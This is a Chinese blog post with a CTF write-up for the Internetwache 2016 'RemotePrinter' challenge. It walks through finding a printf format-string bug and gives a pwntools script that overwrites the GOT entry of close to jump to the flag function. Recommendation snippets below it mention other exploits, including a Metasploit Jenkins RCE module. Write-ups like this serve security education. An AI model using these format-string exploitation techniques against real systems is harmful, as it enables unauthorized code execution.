CTF-Internetwache2016-exp-RemotePrinter

最新推荐文章于 2021-01-18 16:04:01 发布
最新推荐文章于 2021-01-18 16:04:01 发布
阅读量426 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iextract/article/details/70449128
版权

CTF-Internetwache2016-exp-RemotePrinter

自今天开始在csdn记录下有些感想或是某些解题过程。以前只在csdn查询、下载资料,没有想到记录。
Ps:心态爆炸,这个笔记本动一下卡7秒是什么鬼哦

  • 查看给出的二进制文件,file RemotePrinter check.sh --file RemotePrinter
    RemotePrinter: ELF 32-bit LSB executableRemotePrinter: ELF 32-bit LSB executable
    No RELRO No canary found NX disabled No PIE No RPATH No RUNPATH RemotePrinter

  • 拖进虚拟机跑一下,观察行为,同时拖进IDA Pro看看逻辑

虚拟机运行结果

IDA Pro

ψ(`∇´)ψ,找到了,熟悉的printf(&addr),看来突破口就是这里啦~
不熟悉的朋友可以参考下这个PDF:Format String Exploitation-Tutorial

  • 再去虚拟机试试,找找这个值是栈上第几个参数,同时在IDA里面看strings table,发现一个函数

flag

python -c "print 'ABCD'+'.%p'*10" | nc -l 4444
得到这个东西
This is a remote printer!
Enter IPv4 address:127.0.0.1
Enter port:4444
Thank you, I'm trying to print 127.0.0.1:4444 now!
ABCD.0xffbda85c.0x2000.(nil).(nil).(nil).(nil).0x44434241.0x2e70252e.0x252e7025.0x70252e70

    #!/usr/bin/env python
    from pwn import *
    RemoteP=ELF('./RemotePrinter')
    close_addr=RemoteP.got['close']
    v_str=p32(close_addr)+p32(close_addr+2)

    flag_addr=0x08048867
    head_h=0x0804-8    #len(close_addr)=8
    tail_h=0x8867-head_h-8

    v_str+="%{}c%8$hn%{}c%7$hn".format(head_h, tail_h) #little endian,首先覆写高位字节,即地址的前2字节
    print v_str

  • 好,再来一次看看效果
    python Re.py | nv -l 4444

    YAY, FLAG: Thanks:)

    本地实验,我把flag.txt内容换了…….

iextract
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SWPUCTF 2022 新生赛]InfoPrinter
Lt95625142的博客
08-22 157
所以我们大概的思路就是泄露libc地址算出system地址,强改为system,#用的libcsearcher,远端多试几个就完事。利用puts(xx),强改为bin/sh。输入可以得到我们输入字符串的位置在。可以看到data中位于这个位置。就可以获得偏移量是6。
CTF术语_Reverse&Pwn(持续更新)
F1ash000
08-18 3285
Reverse: OD ---- OllyDebug :具有可视化界面的 32 位汇编-分析调试器,动态调试 IDA ----IDA Pro:交互式反汇编器,静态反编译软件 OEP ---- Original Entry Point : 程序入口点 PUSHAD(压栈): 代表程序的入口点 POPAD (出栈) : 代表程序的出口点,与PUSHAD相对应,一般找到这个OEP就在附近...
.exp文件_CTF中文件上传及文件包含粗略总结
weixin_39619433的博客
11-22 595
【文件上传】一、前端检查前端对文件后缀进行检查,该种通过抓包修改数据包即可解决二、文件名检查(1)大小写绕过在windows下,可以将后缀写为pHp(2)unicode当目标存在json_decode且检查在json_decode之前,可以将php写为\u0070hp(3)php3457该项为apache专属关键点在/etc/apache2/mods-available/php5.6.c...
CTF中的EXP编写技巧 zio库的使用
weixin_30496431的博客
05-09 606
zio库没有提供文档 这个是官方给出的一个例子程序 1 from zio import * 2 io = zio('./buggy-server') 3 # io = zio((pwn.server, 1337)) 4 5 for i in xrange(1337): 6 io.writeline('add ' + str(i)) 7 io.re...
Internetwache-CTF-2016:Internetwache CTF 2016存储库
05-03
博客文章: ://en.internetwache.org/internetwache-ctf-2016-review-01-03-2016/ 计分板 计分板基于。 有关更多信息,请检查README.tinyctf.md和LICENSE.tinyctf.md 。 您可以在这里找到我们的修改后的分叉: : ...
Internetwache-CTF-2016, Internetwache CTF 2016存储库.zip
09-18
Internetwache-CTF-2016, Internetwache CTF 2016存储库 Internetwache CTF 2016这是 Internetwache CTF 2016存储库。 它包含所有用于构建和承载CTF的文件。工具和注释。 ctf.db 包含最终的记分板信息。的详细信息...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-all-in-one
01-30
ctf-all-in-one
BUUCTF-刷题记录-9
qq_45628145的博客
10-06 2689
MISC [DDCTF2018]第四扩展FS foremost分离出来一个压缩包,密码即为图片详细信息里面的Pactera,对解压出来的文件进行词频分析,得到 DCTF{huanwe1sik4o!} 也就是flag,不过提交居然不对劲,无语无语,百读到了一个wp,居然是这里面的flag,但其实是DDCTF做了一个反作弊的功能,感觉应该是平台负责人上传了自己的附件,然后flag直接用的别人的。 [SUCTF2019]protocol usb的流量包,直接上命令 tshark -r usb.pcapng -T
poc, vul, exp都是什么意思呢?
ly969434341的专栏
05-04 8360
poc, vul, exp都是什么意思呢? 转自:https://www.zhihu.com/question/26053378 答:poc:proof of concept :漏洞的概念证明 vul:vulnerable:漏洞 expexploit:漏洞利用,一般是个demo程序...
[EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)
weixin_30539835的博客
03-14 333
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf...
pwn学习-简单exp的编写
qq_39153247的博客
08-16 6029
不太喜欢写博客,水平有限见谅。   记录一些关于pwntools的简单用法 expexploit的简写,可不是experience。   0x00.  下载pwntools: 现在需要sudo pip install pwntools就可以了(linux环境下,且环境应该是2.7) 安装好之后你就也拥有了checksec 查看当前ELF文件的保护情况 以及ROPgadget 可以...
*CTF2021部分题目解题思路及exp
liucc09的博客
01-18 3097
babyheap 这是pwn里面唯一的传统heap题,使用的是新的libc2.27,chunk被free到tcache后bk位置会被写入一个地址,再次free时如果bk有这个地址会和tcache里的所有chunk挨个比较,发现一样的就报double free tcache 2,因此要再free之后把bk置零就行了。 题目第一个坑,在edit方法里面读入数据是从chunk+8的位置的开始写,也就是不让修改fd,这导致虽然有UAF,也无法很方便的实现任意地址写。解决方法为构造重叠的chunk,从而改到tcach
CTF_EXP03: [SUCTF 2019] EasySQL
Senimo
10-13 263
CTF_EXP03: [SUCTF 2019] EasySQL 启动靶机,打开页面: 一个简单的计算器页面,查看网页源码: 提示设置了WAF以确保安全,尝试访问calc.php: 得到了WAF源码,分析代码: 需要传入变量num的值 设置了一系列黑名单的值 如果传入的变量num中有黑名单包括的符号,将终止程序 否则将输出num的内容 根据PHP的解析规则:如果变量前面有空格,会去掉前面的空格再解析 WAF限制了参数num,将传入的参数'num'前添加空格,即'? num'可绕过WAF的判断,将字符
CTF—逆向入门题目(超详细)
热门推荐
CharlesGodX的博客
09-13 7万+
0x00:介绍 以下为一些简单的Windows逆向入门题目,帮助一些刚接触逆向又无法下手的朋友,如果对安卓逆向感兴趣的朋友可以看一下我的这一篇安卓逆向入门题目哦:https://blog.csdn.net/CharlesGodX/article/details/86602958 0x01:题目 1.Bugkuctf平台中的逆向题easy_vb: 打开文件发现需要输入注册码获取flag ...
CTF_EXP01:BugkuCTF 秋名山老司机
Senimo
10-11 443
CTF_EXP 第一周ctf_exp01: BugkuCTF 秋名山老司机ctf_exp02: XCTF PHP2ctf_exp03: [SUCTF 2019] EasySQL 第一周入门EXP,挑选了几道简单的CTF题目上手,主要都是通过Python中的Reques模块进行GET和POST传参,对可能的结果进行限制与筛选,实现输入题目链接即可得到flag。 ctf_exp01: BugkuCTF 秋名山老司机 题目:BugkuCTF 秋名山老司机 提示为通过POST方式传入变量value的值, 构造如下
ctf-qsnctf此地无银三百
最新发布
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值